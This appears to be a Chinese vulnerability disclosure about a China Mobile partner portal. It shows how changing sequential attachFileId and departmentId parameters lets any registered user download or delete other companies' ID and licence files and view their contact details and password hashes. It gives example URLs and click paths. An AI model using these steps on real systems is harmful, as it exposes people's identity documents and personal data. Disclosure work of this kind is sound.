http://si.power.10086.cn/si/portal/login.jsp 任何人都可以注册帐号。
【下载或删除大量证件信息】
登录后点击"资质合作"-"合作办理"-"新增资质合作",上传一个文件。
得到如下链接:
修改其中的attachFileId参数,即可下载他人附件。(这是一个公差为1的等差数列 ._.
http://si.power.10086.cn/server/spreq/attachment!download.action?attachFileId=801100010000 “法人身份证.rar”
http://si.power.10086.cn/server/spreq/attachment!download.action?attachFileId=801100010001 “开户许可证(广安门).rar”
http://si.power.10086.cn/server/spreq/attachment!download.action?attachFileId=801100010002 “税务登记证.rar”
...
http://si.power.10086.cn/server/spreq/attachment!download.action?attachFileId=801100010888 “法人身份证.jpg”
等...
我们点击删除:
修改这里的attachFileId就可以删除他人的文件,这里就不截图了,删太多不好 ._.
【越权读取他人帐号信息】
点击"系统管理" - "修改个人资料"
修改department.departmentId即可越权查看他人帐号信息,包括公司名、手机号、邮箱、登录ID和并不知道加密方式的密码 ._.
顺手补张图
如上。
您可能也喜欢: | ||||
中国移动某信息管理系统(中央)某处信息泄漏大量合作伙伴躺枪 |
中国南方航空预定管理系统信息泄露 |
中国移动12580酒店管理系统Stru命令执行! |
同联科技网吧信息安全管理系统任意文件下载漏洞 |
中国移动某系统存在漏洞(泄露12000多条内部员工信息) |
无觅 |